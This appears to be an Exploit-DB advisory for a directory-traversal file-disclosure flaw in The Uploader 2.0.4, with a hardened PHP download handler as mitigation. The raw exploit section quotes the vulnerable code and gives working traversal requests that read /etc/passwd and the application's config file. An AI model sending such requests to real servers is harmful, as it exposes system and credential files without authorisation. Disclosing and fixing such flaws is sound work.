Vendor: The Uploader
By: Xa7m3d
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote File Disclosure
CWE: 434
Product Name: The Uploader
Affected Version From: 2.0.4
Affected Version To: 2.0.4
Patch Exists: Yes
Related CWE: N/A
CPE: theuploader:theuploader:2.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 9.10
Year: 2010

The Uploader 2.0.4 Remote File disclosure Vulnerability

The Uploader 2.0.4 is vulnerable to a remote file disclosure vulnerability. The 'filename' parameter of the 'api/download_launch.php' script is appended to the upload directory path without any validation, so directory-traversal sequences are not filtered. An attacker can exploit this by sending a specially crafted HTTP request to the vulnerable script, which lets them read the contents of arbitrary files that the web server process can access.

Mitigation:

Upgrade to the latest version of The Uploader, which is not vulnerable to this issue.
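For reference, a hardened form of the download handler described above, written as an added example rather than The Uploader's own code or its actual fix. The upload directory path and the helper name `resolveUploadPath` are assumptions; the point is that the user-supplied name is rejected if it carries any path component, and the resolved file must still sit inside the upload directory.

```php
<?php
// Added example, not code from The Uploader. Hardened replacement for the
// unvalidated fopen($main['upload_directory'] . $_GET['filename']) pattern.
declare(strict_types=1);

/**
 * Map a user-supplied filename to a file inside $uploadDir, or return null.
 * Rejects (rather than silently rewrites) any name containing path separators
 * or leading dots, then checks containment on the realpath()-resolved result
 * so symlinks inside the upload directory cannot point outside it.
 */
function resolveUploadPath(string $uploadDir, string $filename): ?string
{
    $base = realpath($uploadDir);
    if ($base === false) {
        return null;
    }
    // "../../../../../etc/passwd" and "../config.inc.php" both fail here.
    if ($filename === '' || $filename !== basename($filename)
        || $filename[0] === '.' || preg_match('/[\x00-\x1f]/', $filename)) {
        return null;
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . $filename);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Containment check after symlink resolution.
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Assumption: the upload directory lives one level above api/.
$uploadDir = __DIR__ . '/../uploads';
$path = resolveUploadPath($uploadDir, $_GET['filename'] ?? '');
if ($path === null) {
    http_response_code(404);
    exit('File not found');
}

// Quote the filename and strip characters that could break the header.
$safeName = str_replace(['"', "\r", "\n"], '', basename($path));
header('Content-Type: application/octet-stream');
header('Content-Length: ' . (string) filesize($path));
header('Content-Disposition: attachment; filename="' . $safeName . '"');
readfile($path);
```

A request whose filename is rejected is answered with a generic 404, so the response does not reveal whether the traversal target exists.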

Exploit-DB raw data:

=================================================
The Uploader 2.0.4 Remote File disclosure Vulnerability
=================================================

==============================================

# Script Name : The Uploader
# Version : [2.0.4]
# Language : php
# Author : Xa7m3d (H4K@hotmail.ch)
# Download : http://sourceforge.net/projects/theuploader
# Tested on : ubuntu 9.10

==============================================

File Disclosure :
in : api/download_launch.php

#######################################
$open=fopen($main['upload_directory'] . $_GET['filename'], "r"); // (+) unvalidated user input concatenated into the path
$size=filesize($main['upload_directory'] . $_GET['filename']);
$read=fread($open, $size);
header("Content-Type: application/octet-stream");
header("Content-Length: " . $size);
header("Content-Transfer-Encoding: binary");
header("Content-Disposition: attachment; filename=" . $_GET['filename']); // (+) same unvalidated value echoed into the header
#######################################

3XP :

api/download_launch.php?filename=../../../../../etc/passwd

Example :

http://server/theuploader/api/download_launch.php?filename=../config.inc.php
T3AM Piracy Unlimited Tunisia : # Cyb3R H3LL # k[i]ng # La Haft Xroy #